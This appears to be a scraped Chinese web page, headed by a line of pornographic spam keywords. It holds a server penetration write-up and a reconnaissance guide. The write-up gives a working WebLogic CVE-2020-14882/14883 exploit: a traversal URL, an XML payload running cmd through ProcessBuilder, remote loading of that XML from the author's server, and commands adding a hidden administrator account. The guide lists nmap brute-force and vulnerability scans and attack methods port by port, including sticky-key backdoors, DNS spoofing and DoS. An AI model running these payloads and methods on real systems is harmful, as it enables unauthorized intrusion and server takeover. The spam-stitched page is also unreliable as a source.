欧美vvv,亚洲第一成人在线,亚洲成人欧美日韩在线观看,日本猛少妇猛色XXXXX猛叫

新聞資訊

    《中華人民共和國刑法》
    第二百八十五條規(guī)定,非法侵入計算機信息系統(tǒng)罪;非法獲取計算機信息系統(tǒng)數(shù)據(jù)、非法控制計算機信息系統(tǒng)罪;提供侵入、非法控制計算機信息系統(tǒng)程序、工具罪是指,違反國家規(guī)定,侵入國家事務、國防建設、尖端科學技術領域的計算機信息系統(tǒng)的,處三年以下有期徒刑或者拘役。

    違反國家規(guī)定,侵入前款規(guī)定以外的計算機信息系統(tǒng)或者采用其他技術手段,獲取該計算機信息系統(tǒng)中存儲、處理或者傳輸?shù)臄?shù)據(jù),或者對該計算機信息系統(tǒng)實施非法控制,情節(jié)嚴重的,處三年以下有期徒刑或者拘役,并處或者單處罰金;情節(jié)特別嚴重的,處三年以上七年以下有期徒刑,并處罰金。

    提供專門用于侵入、非法控制計算機信息系統(tǒng)的程序、工具,或者明知他人實施侵入、非法控制計算機信息系統(tǒng)的違法犯罪行為而為其提供程序、工具,情節(jié)嚴重的,依照前款的規(guī)定處罰。

    背景說明
    本次滲透已獲得授權,本文僅用于分享滲透思路,若將本文思路用于違法行為,后果自負!
    本次滲透目的用于找回一臺服務器密碼,因為管理員密碼丟失,無法登錄和管理此服務器,而停機PE修改密碼必然會影響業(yè)務運行,因此本次采用滲透方式嘗試獲取管理員密碼。

    信息收集
    一開始我有想過MS17-010永恒之藍漏洞和向日葵CNVD-2022-10270/CNVD-2022-03672,可以一擊必殺,但現(xiàn)實肯定沒這么簡單,MS17-010的補丁已經打了,而向日葵這玩意會自動升級。

    所以先用Goby全端口全漏洞掃描了一遍

    能掃出來的高危漏洞就有5個,這不穩(wěn)了?
    ActiveMQ default admin account
    默認管理員密碼漏洞,漏洞存在,但是這個組件我不熟悉,沒法利用

    CVE-2019-0708 BlueKeep Microsoft Remote Desktop RCE
    BlueKeep這漏洞在我心里就是個藍屏漏洞,在這里無用武之地

    tomcat lfi (CVE-2020-1938)
    文件讀取、包含,我這里管理員都登陸不上去,所以也沒啥用

    Weblogic Server RCE (CVE-2021-2109)
    遠程代碼執(zhí)行漏洞,實現(xiàn)起來有點復雜,先放一下

    Oracle WebLogic Unauthenticated Takeover (CVE-2020-14883)
    CVE-2020-14882&CVE-2020-14883 Weblogic未授權遠程命令執(zhí)行漏洞,這兩個漏洞一般是同時修復,存在一個基本也就存在另一個,兩者結合,可以一試

    構造POC
    查看登錄頁

    http://IP:7001/console/login/LoginForm.jsp

    后臺越權訪問

    http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

    編寫POC.XML,上傳到自己的web服務器

    <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
      <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
          <list>
            <value>cmd</value>
            <value>/c</value>
            <value><![CDATA[echo hello > "../../../wlserver/server/lib/consoleapp/webapp/images/xxx.jsp"]]></value>
          </list>
        </constructor-arg>
      </bean>
    </beans>

    執(zhí)行遠端XML

    http://IP:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://我的web服務器/poc.xml")

    驗證結果

    http://IP:7001/console/images/xxx.jsp

    穩(wěn)了!查看當前用戶,把POC里的echo hello改成whoami,驗證結果

    system權限,我焯!
    依次構造添加用戶并加入管理員組的POC

    net user test test /add
    net localgroup administrators test /add

    直接遠程登陸

    因為沒有管理員密碼,所以管理員從未登陸過,使用Mimikatz獲取管理員密碼的嘗試失敗了。

    我這里選擇修改administrator密碼,至此,滲透完成!

    修復建議
    1、及時更新系統(tǒng)補丁,淘汰已過期的操作系統(tǒng),如windows2008R2
    2、及時更新服務組件,如本文中OracleWebLogic、ActiveMQ、tomcat均存在漏洞
    3、安裝EDR、部署IPS入侵防御系統(tǒng),增強系統(tǒng)安全性

    公眾號:滲透師老A
    專注分享滲透經驗,干貨技巧...
    .

    什么是信息搜集

    信息搜集也稱踩點,信息搜集毋庸置疑就是盡可能的搜集目標的信息,包括端口信息、DNS信息、員工郵箱等等看似并不起眼的一些信息都算是信息搜集,這些看似微乎其微的信息,對于滲透測試而言就關乎到成功與否了。

    信息搜集的重要性

    信息搜集是滲透測試的最重要的階段,占據(jù)整個滲透測試的60%,可見信息搜集的重要性。根據(jù)收集的有用信息,可以大大提高我們滲透測試的成功率。

    信息搜集的分類

    1、主動式信息搜集(可獲取到的信息較多,但易被目標發(fā)現(xiàn))

    2、通過直接發(fā)起與被測目標網絡之間的互動來獲取相關信息,如通過Nmap掃描目標系統(tǒng)。

    3、被動式信息搜集(搜集到的信息較少,但不易被發(fā)現(xiàn))

    4、通過第三方服務來獲取目標網絡相關信息。如通過搜索引擎方式來搜集信息。


    信息收集哪些東西:


    1. whois信息
    2. 子域名
    3. 旁站
    4. 端口
    5. 目錄,敏感信息泄露
    6. C段
    7. 網站架構
    8. 判斷WAF
    9. 判斷CMS
    10. 真實IP
    11. DNS信息
    12. 社工利用

    信息收集流程:

    網站由域名,服務器,WEB應用組成。

    可以先從域名開始

    1. 域名:whois,備案,子域名等
    2. 服務器:真實IP,DNS信息,端口,等
    3. WEB:網站框架,目錄信息敏感信息泄露,旁站,C段,WAF,CMS等
    4. 企業(yè):天眼查,信用信息等

    信息收集腦圖:


    域名信息收集:


    Whois查詢:

    Whois 簡單來說,就是一個用來查詢域名是否已經被注冊,以及注冊域名的詳細信息的數(shù)據(jù)庫(如域名所有人、域名注冊商、域名注冊日期和過期日期、DNS等)。通過域名Whois服務器查詢,可以查詢域名歸屬者聯(lián)系方式,以及注冊和到期時間

    可以通過whois信息進行反查,郵箱,聯(lián)系人等信息來反查到更多的信息

    查詢域名注冊郵箱
    通過域名查詢備案號
    通過備案號查詢域名
    反查注冊郵箱
    反查注冊人
    通過注冊人查詢到的域名在查詢郵箱
    通過上一步郵箱去查詢域名
    查詢以上獲取出的域名的子域名

    查詢方式:

    主動查詢:

    kali 自帶whois查詢
    命令:whois + ip/域名

    被動查詢:

    1. http://tool.chinaz.com/ipwhois/
    2. http://whois.xinnet.com/
    3. https://whois.cloud.tencent.com/
    4. https://site.ip138.com/
    5. https://www.whois.net/
    6. https://whois.aizhan.com/IP反查:Dnslytics地址:https://dnslytics.com/

    利用Dnslytics反查IP可以得到如下信息:

    IP information
    Network information
    Hosting information
    SPAM database lookup
    Open TCP/UDP ports
    Blocklist lookup
    Whois information
    Geo information
    Country information
    Update information 

    利用Dnslytics反查域名可以得到如下信息:

    Domain and Ranking Information
    Hosting Information{
     A / AAAA Record
     NS Record
     MX Record
     SPF Record
    }
    Web Information
    Whois Information

    瀏覽器插件:

    通過Google、FireFox等插件的使用,收集域名信息

    myip.ms:

    TCPIPUTILS:

    DNSlytics:

    子域名收集:

    子域名收集可以發(fā)現(xiàn)更多目標,以增加滲透測試成功的可能性,探測到更多隱藏或遺忘的應用服務,這些應用往往可導致一些嚴重漏洞。當一個主站堅不可摧時,我們可以嘗試從分站入手。

    查詢方式:

    主動收集:

    1. layer子域名挖掘機5.0:https://pan.baidu.com/s/1wEP_Ysg4qsFbm_k1aoncpg 提取碼:uk1j
    2. subDomainsBrute:https://github.com/lijiejie/subDomainsBrute
    3. wydomain:https://github.com/ring04h/wydomain
    4. broDomain:https://github.com/code-scan/BroDomain
    5. ESD:https://github.com/FeeiCN/ESD
    6. aiodnsbrute:https://github.com/blark/aiodnsbrute
    7. OneForAll:https://github.com/shmilylty/OneForAll
    8. subfinder:https://github.com/projectdiscovery/subfinder
    9. Sublist3r:https://github.com/aboul3la/Sublist3r

    被動收集:

    1. ip138:https://site.ip138.com/
    2. 站長工具:http://tool.chinaz.com/subdomain/?domain=
    3. hackertarget:https://hackertarget.com/find-dns-host-records/
    4. phpinfo:https://phpinfo.me/domain/
    5. t1h2ua:https://www.t1h2ua.cn/tools/
    6. dnsdumpster:https://dnsdumpster.com/
    7. chinacycc:https://d.chinacycc.com/index.php?m=Login&a=index
    8. zcjun:http://z.zcjun.com/
    9. 搜索引擎語法:(site:域名)

    工具使用

    layer子域名挖掘機5.0:使用這款工具首先要安裝.net framework 4.0以上,否則會出現(xiàn):

    備案信息

    備案信息分為兩種,一種是IPC備案信息查詢,一種是公安部備案信息查詢。如果是國外的服務器是不需要備案的,因此可以忽略此步驟,國內的服務器是需要備案的,因此可以嘗試獲取信息。

    查詢方式:

    被動收集:

    1. ICP備案查詢網:http://www.beianbeian.com/
    2. ICP備案查詢-站長工具:http://icp.chinaz.com/
    3. SEO綜合查詢-愛站:https://www.aizhan.com/cha/
    4. 批量查詢-站長工具:http://icp.chinaz.com/searchs
    5. 美國企業(yè)備案查詢:https://www.sec.gov/edgar/searchedgar/companysearch.html
    6. 公安部備案查詢:http://www.beian.gov.cn/portal/recordQuery
    7. 主動收集

    社工


    服務器信息收集


    DNS信息收集

    通過查詢DNS信息,我們可能可以發(fā)現(xiàn)網站的真實ip地址,也可以嘗試測試是否存在DNS域傳送漏洞。

    查詢方式

    主動收集

    1. Kali(host、big命令)
    2. windows(nslookup命令)

    被動收集

    1. dnsdb:https://www.dnsdb.io/zh-cn/
    2. viewdns:https://viewdns.info/
    3. 站長工具:http://tool.chinaz.com/dns/
    4. tool:https://tool.lu/dns/

    端口信息收集

    查詢方式

    主動收集

    1. Nmap:https://github.com/nmap/nmap
    2. Masscan:https://github.com/robertdavidgraham/masscan
    3. masnmapscan:https://github.com/hellogoldsnakeman/masnmapscan-V1.0
    4. ZMap:https://github.com/zmap/zmap

    被動收集

    1. FOFA:https://fofa.so/
    2. 鐘馗之眼:https://www.zoomeye.org/
    3. shodan:https://www.shodan.io/

    瀏覽器插件

    1. Shodan
    2. TCPIPUTILS
    3. DNSlytics
    4. fofa-view

    工具使用

    • Nmap 掃描多個ip: 掃描整個子網 nmap 192.168.6.1/24

      nmap 192.168.1.1/16

      nmap 192.168.1-30.1-254

      nmap 192.168.1-254.6

      掃描多個主機 namp 192.168.6.2 192.168.6.6

      掃描一個小范圍 nmap 192.168.6.2-10

      掃描txt內的ip列表 nmap -iL text.txt

      掃描除某個目標外 nmap 192.168.6.1/24 -exclude 192.168.6.25
    • 繞過Firewalld掃描主機端口:

    通過不同的協(xié)議(TCP半連接、TCP全連接、ICMP、UDP等)的掃描繞過Firewalld的限制

    nmap -sP 192.33.6.128
    nmap -sT 192.33.6.128
    nmap -sS 192.33.6.128
    nmap -sU 192.33.6.128
    nmap -sF 192.33.6.128
    nmap -sX 192.33.6.128
    nmap -sN 192.33.6.128
    • 初步掃描端口信息 nmap -T4 -A -v -Pn 192.168.1.1/24 -p 21,22,23,25,80,81,82,83,88,110,143,443,445,512,513,514,1433,1521,2082,2083,2181,2601,2604,3128,3306,3389,3690,4848,5432,5900,5984,6379,7001,7002,8069,8080,8081,8086,8088,9200,9300,11211,10000,27017,27018,50000,50030,50070 -oN nmap_result.txt
    • 掃描端口并且標記可以爆破的服務 nmap 127.0.0.1 --script=ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute
    • 判斷常見的漏洞并掃描端口 nmap 127.0.0.1 --script=auth,vuln
    • 精確判斷漏洞并掃描端口 nmap 127.0.0.1 --script=dns-zone-transfer,ftp-anon,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,http-backup-finder,http-cisco-anyconnect,http-iis-short-name-brute,http-put,http-php-version,http-shellshock,http-robots.txt,http-svn-enum,http-webdav-scan,iis-buffer-overflow,iax2-version,memcached-info,mongodb-info,msrpc-enum,ms-sql-info,mysql-info,nrpe-enum,pptp-version,redis-info,rpcinfo,samba-vuln-cve-2012-1182,smb-vuln-ms08-067,smb-vuln-ms17-010,snmp-info,sshv1,xmpp-info,tftp-enum,teamspeak2-version

    Masscan+Nmap:

    有些時候網站的入口點屬于非常規(guī)端口,因此是必須要做全端口掃描,做全端口掃描的時候由于namp發(fā)包量大經常出現(xiàn)各種問題,如端口掃描不全、獲得信息不準等等,為了解決上述問題,這里提供一個masscan+nmap結合的方式進行快速掃描。

    原理:使用masscan做全端口開放檢測,檢測出來端口信息后,用nmap進行服務信息識別。

    使用:終端輸入以下命令執(zhí)行即可

    # masscan 192.33.6.145 -p1-65535 --rate 1000 -oL ports
    
    # ports=$(cat ports | awk -F " " '{print $3}' | sort -n | tr '\n' ',' | sed 's/,$//' | sed 's/^,,//')
    
    # nmap -sV -p $ports 192.33.6.145

    常見端口/服務/入侵:

    端口:21 服務:FTP/TFTP/VSFTPD 總結:爆破/嗅探/溢出/后門
    端口:22 服務:ssh遠程連接 總結:爆破/openssh漏洞
    端口:23 服務:Telnet遠程連接 總結:爆破/嗅探/弱口令
    端口:25 服務:SMTP郵件服務 總結:郵件偽造
    端口:53 服務:DNS域名解析系統(tǒng) 總結:域傳送/劫持/緩存投毒/欺騙
    端口:67/68 服務:dhcp服務 總結:劫持/欺騙
    端口:110 服務:pop3 總結:爆破/嗅探
    端口:139 服務:Samba服務 總結:爆破/未授權訪問/遠程命令執(zhí)行
    端口:143 服務:Imap協(xié)議 總結:爆破161SNMP協(xié)議爆破/搜集目標內網信息
    端口:389 服務:Ldap目錄訪問協(xié)議 總結:注入/未授權訪問/弱口令
    端口:445 服務:smb 總結:ms17-010/端口溢出
    端口:512/513/514 服務:Linux Rexec服務 總結:爆破/Rlogin登陸
    端口:873 服務:Rsync服務 總結:文件上傳/未授權訪問
    端口:1080 服務:socket 總結:爆破
    端口:1352 服務:Lotus domino郵件服務 總結:爆破/信息泄漏
    端口:1433 服務:mssql 總結:爆破/注入/SA弱口令
    端口:1521 服務:oracle 總結:爆破/注入/TNS爆破/反彈shell2049Nfs服務配置不當
    端口:2181 服務:zookeeper服務 總結:未授權訪問
    端口:2375 服務:docker remote api 總結:未授權訪問
    端口:3306 服務:mysql 總結:爆破/注入
    端口:3389 服務:Rdp遠程桌面鏈接 總結:爆破/shift后門
    端口:4848 服務:GlassFish控制臺 總結:爆破/認證繞過
    端口:5000 服務:sybase/DB2數(shù)據(jù)庫 總結:爆破/注入/提權
    端口:5432 服務:postgresql 總結:爆破/注入/緩沖區(qū)溢出
    端口:5632 服務:pcanywhere服務 總結:抓密碼/代碼執(zhí)行
    端口:5900 服務:vnc 總結:爆破/認證繞過
    端口:6379 服務:Redis數(shù)據(jù)庫 總結:未授權訪問/爆破
    端口:7001/7002 服務:weblogic 總結:java反序列化/控制臺弱口令
    端口:80/443 服務:http/https 總結:web應用漏洞/心臟滴血
    端口:8069 服務:zabbix服務 總結:遠程命令執(zhí)行/注入
    端口:8161 服務:activemq 總結:弱口令/寫文件
    端口:8080/8089 服務:Jboss/Tomcat/Resin 總結:爆破/PUT文件上傳/反序列化
    端口:8083/8086 服務:influxDB 總結:未授權訪問
    端口:9000 服務:fastcgi 總結:遠程命令執(zhí)行
    端口:9090 服務:Websphere 總結:控制臺爆破/java反序列化/弱口令
    端口:9200/9300 服務:elasticsearch 總結:遠程代碼執(zhí)行
    端口:11211 服務:memcached 總結:未授權訪問
    端口:27017/27018 服務:mongodb 總結:未授權訪問/爆破

    端口利用總結:

    21端口滲透解析:

    介紹:Ftp一般是用于對遠程服務器進行管理,大多數(shù)都用于對Web系統(tǒng)進行管理。一般密碼泄露是直接威脅Web系統(tǒng)安全的,一旦讓黑客知道是可以通過提權直接控制服務器。

    1. 爆破:Ftp爆破工具很多,如你所使用的系統(tǒng)為Kali,這里我推薦hydra(九頭蛇)以及metasploit(msf)中的ftp爆破模塊。因為Kali下集成了hydra和msf。
    2. Ftp匿名訪問:有些小白會選擇一些小型的主機服務商,這些服務商Ftp服務默認都是匿名可登陸。例如:用戶名:admin,密碼:空或者任意郵箱等。
    3. 后門vsftpd:version 2到2.3.4都存在了后門漏洞,黑客可以通過該漏洞獲取ROOT權限。這里推薦msf下的exploit/unix/ftp/vsftpd_234_backdoor模塊。
    4. 嗅探:如Ftp使用明文傳輸技術,可以使用Cain進行滲透。但是要存在于同一局域網,并且需要用到欺騙技術,且已經監(jiān)聽網關。
    5. Ftp遠程代碼溢出:推薦使用nmap掃描Ftp版本號,使用msf搜索(searc)對應模塊。

    22端口滲透解析:

    介紹:SSH是協(xié)議,是使用在協(xié)議應用上的,SSH是Secure Shell的縮寫。有IETF的網絡工作小組所制定;SSH是建立在應用層和傳輸層基礎上的安全協(xié)議。

    1. 弱口令:推薦使用hydra(九頭蛇)或msf中的ssh爆破模塊。
    2. 防火墻SSH后門
    3. 退格 OpenSSL
    4. Openssh 用戶枚舉 例如:CVE-2018-15473。

    23端口滲透解析:

    介紹:Telnet是一種很老的遠程管理方式,使用telnet工具登陸系統(tǒng)的過程中,網絡上的傳輸用戶和密碼都是以明文的方式去傳送的,所以這是一種很不安全的管理方式,黑客可以使用嗅探技術進行劫取此類密碼等。

    1. 爆破:暴力破解技術是黑客技術中最常見的技術,推薦使用hydra或者msf中的telnet模塊進行暴力破解。
    2. 嗅探:在Linux系統(tǒng)里面一般是采用SSH進行遠程連接訪問的,傳輸?shù)拿舾袛?shù)據(jù)都是進行加密的。但是對于windows下的telnet是脆弱的,因為在windows中是默認沒有經過任何加密就在網絡中進行傳輸,可以使用cain等嗅探工具進行截獲密文對其遠程控制。
    3. 繞口令:弱口令大部分用于大批量的爆破,對單個主機,推薦使用暴力破解。

    25/465端口滲透解析:

    介紹:smtp:郵箱協(xié)議,在linux中是默認回開啟這個服務的,是一個相對簡單的基于文本的協(xié)議。smtps:這是smtp協(xié)議基于ssl安全協(xié)議之上的一種變種協(xié)議。它繼承了ssl安全協(xié)議的非對稱的加密。我對smtps協(xié)議也很頭疼所以給不出太多的建議。

    1. 爆破
    2. 弱口令
    3. 未授權訪問
    4. 釣魚

    53端口滲透解析:

    介紹:53端口一般是DNS域名服務器的通信端口,用于域名的解析。也是比較關鍵的服務器之一,但是這類服務器很 容易就受到攻擊。

    1. 使用DNS遠程溢出的漏洞直接對主機進行溢出攻擊,成功后一般會直接獲得系統(tǒng)權限。如:Windows DNS API(CVE-2017-11779)
    2. 使用DNS欺騙攻擊,可以對DNS域名服務器進行欺騙,可以配合網頁的木馬進行掛馬攻擊,這是一種很酷的攻擊方法。也是內網滲透中比較常用的方法。(DNS欺騙重定向Web流量)
    3. 拒絕服務攻擊,我相信大家對這個攻擊方法并不陌生,這是一種利用可快速攻擊可導致服務器運行緩慢或網絡癱瘓。如果黑客攻擊其DNS服務器,將會導致該服務器進行域名解析的用戶無法上網。(DNS劫持或DNS拒絕服務攻擊)常見的說法:D死!

    80端口滲透解析:

    介紹:80端口是提供Web服務的端口,對于各位我想的是進入一個新的Web站點可能最會先想到SQL注入的方法,當然腳本滲透液是一項極強的Web滲透技術,同時也能對80端口造成威脅。

    1. 針對windows2000的iis5.5版本,黑客可以使用遠程溢出直接對主機進行攻擊,從而獲取系統(tǒng)權限
    2. 針對windows2000的iis5.5版本,黑客也可以利用“Microsoft IISCGI”文件名錯誤的解碼進行漏洞攻擊,可以使用X-SCAN直接探測到IIS漏洞
    3. IIS寫權漏洞是由于IIS配置不當所造成的安全問題。黑客可以向存在此漏洞的服務器上傳惡意的執(zhí)行代碼。比如腳本木馬(馬兒)控制權限
    4. 普通的http封包是沒有經過加密就在網絡中傳輸?shù)模@樣就可以通過嗅探類的工具截取敏感的數(shù)據(jù),比如使用cain工具等。
    5. 80端口的攻擊,滲透等。更多的是使用腳本滲透的技術,比如SQL,XSS等。利用Web應用程序的漏洞進行滲透是目前來說比較流行的方法
    6. 對于滲透只開放80端口的服務器來說,難度可以很大。利用一些端口復用工具可以解決這個技術難題
    7. CC攻擊的效果是不如DDOS效果明顯的,但是對于一些小型的Web站點來說還是有點用處的。CC攻擊可以對目標站點運行出錯或頁面無法打開,打開過慢。有時候還會爆出Web程序的絕對路徑哦
    8. windows中使用iis搭建Web站點,可查找IIS上傳或解析漏洞,進行馬兒上傳的滲透,從而獲取系統(tǒng)權限等

    135端口滲透解析:

    介紹:135端口主要是用于RPC協(xié)議是提供DCOM服務,PRC可以保證一臺計算機上運行的程序可以順利的執(zhí)行遠程計算機上的代碼;使用DCOM可以通過網絡進行通信。同時這個端口也爆出了不少的漏洞,最嚴重的還是我們熟悉的緩沖區(qū)溢出的漏洞

    1. 查找存在RPC溢出的主機,進行遠程溢出的攻擊,可以直接獲取系統(tǒng)的權限。如果你使用“DSScan”掃描存在漏洞的主機,你可以直接使用’ms05011.exe’進行溢出的攻擊
    2. 弱口令:可以掃描弱口令的主機,利用RPC遠程過程調用開啟telnet服務并登陸且執(zhí)行系統(tǒng)命令。系統(tǒng)的弱口令一般用hydra,對于telnet服務的開啟可以使用工具直接連接。

    139/445端口滲透解析:

    介紹:139端口是提供windows文件和打印機共享以及Unix中的Samba服務,家庭很少會開啟這個服務,但是學校就不一樣了,我可沒有暗示你們什么。445端口其實也是為windows提供文件很打印機的共享,這兩個端口在內網中是使用次數(shù)最多的,但是這兩個端口的漏洞都比較多,而且出現(xiàn)過很多高危漏洞。

    1. 139/445端口的開放主機,大多數(shù)都是使用溢出漏洞進行攻擊,比如445漏洞在msf中的ms-017
    2. 445端口的開放主機,黑客一般是使用‘MS06040’或‘MS08067’或‘ms017010’(可以自己查一下),可以使用nmap工具中-p命令掃描445端口是否開放,但是MS08067對win03系統(tǒng)十分有效不知道為什么
    3. 139/445端口的開放主機,黑客可以使用IPC$進行滲透。在沒有使用特定的的賬戶密碼進行空的連接,權限是最小的,但是獲得特定賬號密碼是成為提升權限的關鍵,比如獲取admin的賬戶口令。
    4. 139/445端口的開放主機,可利用共享獲取敏感信息,這也是內網滲透中收集信息的基本途徑
    5. 自從ms017010的出世,在windows7下445端口進行溢出滲透,大部分在msf中進行的

    1433端口滲透解析:

    介紹:1433是SQLServer默認的端口,SQL Server服務使用兩個端口:tcp-1433、UDP-1434.其中1433用于供SQLServer對外提供服務,1434用于向請求者返回SQLServer使用了哪些TCP/IP端口。1433端口通常遭到黑客的攻擊,最嚴重的還是遠程溢出漏洞了,如由于SQL注射攻擊的方式,數(shù)據(jù)庫面臨著很多威脅,這種攻擊方式是屬于腳本滲透技術的。

    1. 對開放1433端口的數(shù)據(jù)庫服務器,黑客可以嘗試利用溢出的漏洞對主機直接進行攻擊,可以直接獲取到系統(tǒng)的權限。
    2. 暴力破解是一項采用實用的技術,一般對于sql數(shù)據(jù)庫破解的對象都是SA用戶,通過社工的收集使用的字典很快就能破解出SA的密碼。
    3. 嗅探技術也能嗅探到SQL數(shù)據(jù)庫的登陸密碼哦。
    4. 如數(shù)據(jù)庫腳本編寫的漏洞問題,黑客也可以對其進行sql注入,例如:過濾不嚴,就會造成很嚴重的注射漏洞。可以使用針對sql注入的工具直接掃描。

    1521端口滲透解析:

    介紹:1521一般是大型數(shù)據(jù)庫Oracle的默認端口,對于一些沒有安全工作經驗的人來說,還是比較陌生的,以為大多數(shù)接觸到的數(shù)據(jù)庫都是Access、msssql、mysql。一般大型的站點才會使用Oracle數(shù)據(jù)庫系統(tǒng),以為這個數(shù)據(jù)庫系統(tǒng)比較復雜。

    1. Oracle擁有非常非常多的默認用戶名和密碼,破解數(shù)據(jù)庫這樣也是一種方法,但是離不開我們的暴力破解
    2. SQL注射是對所有數(shù)據(jù)庫都有效的方法
    3. 可以在注入點直接創(chuàng)建java,從而執(zhí)行系統(tǒng)命令

    2049端口滲透解析:

    介紹:FS(Network File System)即網絡文件系統(tǒng),是FreeBSD支持的文件系統(tǒng)中的一種,它允許網絡中的計算機之間通過TCP/IP網絡共享資源。在NFS的應用中,本地NFS的客戶端應用可以透明地讀寫位于遠端NFS服務器上的文件,就像訪問本地文件一樣。如今NFS具備了防止被利用導出文件夾的功能,但遺留系統(tǒng)中的NFS服務配置不當,則仍可能遭到惡意攻擊者的利用。

    1. 未授權訪問

    3306端口滲透解析:

    介紹:3306是MYSQL數(shù)據(jù)庫默認的監(jiān)聽端口,通常部署在中型web系統(tǒng)中。在國內LAMP的配置是非常流行的,對于php+mysql構架的攻擊也是屬于比較熱門的話題。mysql數(shù)據(jù)庫允許用戶使用自定義函數(shù)功能,這使得黑客可編寫惡意的自定義函數(shù)對服務器進行滲透,最后取得服務器最高權限。

    1. 由于管理者安全意識淡薄,通常管理密碼設置過于簡單,甚至為空口令。使用破解軟件很容易破解此類密碼,利用破解的密碼登錄遠程mysql數(shù)據(jù)庫,上傳構造的惡意UDF自定義函數(shù)代碼進行注冊,通過調用注冊的惡意函數(shù)執(zhí)行系統(tǒng)命令。或者向web目錄導出惡意的腳本程序,以控制整個web系統(tǒng)
    2. 嗅探對支持3306端口的數(shù)據(jù)庫也存在支持
    3. Sql注入也對mysql數(shù)據(jù)庫有用,可以獲取數(shù)據(jù)庫的敏感信息。還可以使用函數(shù)去讀取系統(tǒng)的敏感配置文件,還可以從web數(shù)據(jù)庫的連接文件中獲得root口令等
    4. 暴力破解弱口令都是不錯的選擇

    3389端口滲透解析:

    介紹:3389是windows遠程桌面服務默認監(jiān)聽的端口,管理員通過遠程桌面對服務器進行維護,這給管理工作帶來的極大的方便。通常此端口也是黑客們較為感興趣的端口之一,利用它可對遠程服務器進行控制,而且不需要另外安裝額外的軟件,實現(xiàn)方法比較簡單。當然這也是系統(tǒng)合法的服務,通常是不會被殺毒軟件所查殺的。使用‘輸入法漏洞’進行滲透。

    1. 對于win2000的版本系統(tǒng),可以使用‘輸入法漏洞’進行滲透,這也是很老的方法了
    2. cain同樣也支持3389端口的嗅探
    3. Shift粘滯鍵后門:5次shift后門
    4. 社會工程學、爆破可以使用msf中的爆破模塊或者hydra、弱口令
    5. ms12_020藍屏攻擊

    4899端口滲透解析:

    介紹:4899端口是remoteadministrator遠程控制軟件默認監(jiān)聽的端口,也就是平時常說的radmini影子。radmini目前支持TCP/IP協(xié)議,應用十分廣泛,在很多服務器上都會看到該款軟件的影子。

    1. readmini也存在很多弱口令的主機,可以通過特定的工具掃描此類型主機
    2. readmini遠控的連接密碼和端口都是寫入到注冊表系統(tǒng)中的,通過使用webshell注冊表讀取功能可讀取radmini在注冊表的各項鍵值內容。

    5432端口滲透解析:

    介紹:PostgreSQL是一種特性非常齊全的自由軟件的對象–關系型數(shù)據(jù)庫管理系統(tǒng),可以說是目前世界上最先進,功能最強大的自由數(shù)據(jù)庫管理系統(tǒng)。包括kali系統(tǒng)中msf也使用這個數(shù)據(jù)庫;淺談postgresql數(shù)據(jù)庫攻擊技術 大部分關于它的攻擊依舊是sql注入。

    1. 爆破、弱口令:postgres postgres
    2. 緩沖區(qū)溢出:CVE-2014-2669

    5631端口滲透解析:

    介紹:5631端口是著名遠程控制軟件pcanywhere的默認監(jiān)聽端口,同時也是世界領先的遠程控制軟件。此軟件設計有缺陷,可以隨意的下載保存連接密碼的.cif文件。可以用專門的破解軟件破解。

    1. 密碼文件破解
    2. PcAnyWhere提權

    5900端口滲透解析:

    介紹:5900端口是遠程控制軟件VNC的默認端口,VNC是基于UNIX和LINUX操作系統(tǒng)免費開放的源碼

    1. VNC軟件存在密碼驗證的繞過漏洞,此高危漏洞可以讓黑客不需要密碼就能登錄到一個系統(tǒng)
    2. cain同樣可以嗅探,還可以端口修改。
    3. VNC的配置同樣是寫入注冊表中的,可以利用注冊表的讀取功能進行加密算法破解
    4. VNC拒絕服務攻擊(CVE-2015-5239)
    5. VNC權限提升(CVE-2013-6886)

    6379端口滲透解析:

    介紹:Redis是一個開源的使用c語言寫的,支持網絡、可基于內存亦可持久化的日志型、key-value數(shù)據(jù)庫。關于這個數(shù)據(jù)庫這兩年還是很火的,暴露出來的問題也很多。特別是暴露的未授權訪問。

    1. 爆破和弱口令
    2. 未授權訪問+配合ssh key提權

    7001/7002端口滲透解析:

    介紹:好像沒什么介紹,就是weblogic中間插件的端口。

    1. 弱口令、爆破、弱密碼等
    2. 管理后臺部署可能有war后門
    3. SSRF
    4. 反序列化漏洞
    5. WebLogic_uac

    8080端口滲透解析:

    介紹:8080端口通常是apache_Tomcat服務器默認監(jiān)聽端口,apache是世界使用排名第一的web服務器。國內就有很多人喜歡有這種服務器。

    1. tomcat遠程代碼執(zhí)行漏洞
    2. tomcat任意文件上傳漏洞
    3. tomcat遠程代碼執(zhí)行信息泄露漏洞
    4. jboss遠程代碼執(zhí)行漏洞
    5. jboss反序列化漏洞
    6. jboss漏洞利用。

    27017端口滲透解析:

    介紹:沒什么可以說的,和其他數(shù)據(jù)庫攻擊方法差不多。

    1. 爆破、弱口令
    2. 未授權訪問。

    繞過CND,獲取網站真實IP

    CND繞過思路

    1. 二級域名法 一般網站不會所有的二級域名放CDN,因此我們可以利用這點來獲取網站的真實ip
    2. 多地ping法 由CDN的原理,不同的地方去Ping服務器,如果IP不一樣,則目標網站肯定使用了CDN
    3. nslookup法 找國外的比較偏僻的DNS解析服務器進行DNS查詢,因為大部分CDN提供商只針對國內市場,而對國外市場幾乎是不做CDN,所以有很大的幾率會直接解析到真實IP
    4. 查看郵件法 通過查看郵件原文來確定ip地址,CDN總不會發(fā)送郵件吧
    5. RSS訂閱法 RSS原理于郵件法差不多
    6. 查看歷史解析記錄法 查找域名歷史解析記錄,域名在上CDN之前用的IP,很有可能就是CDN的真實源IP地址
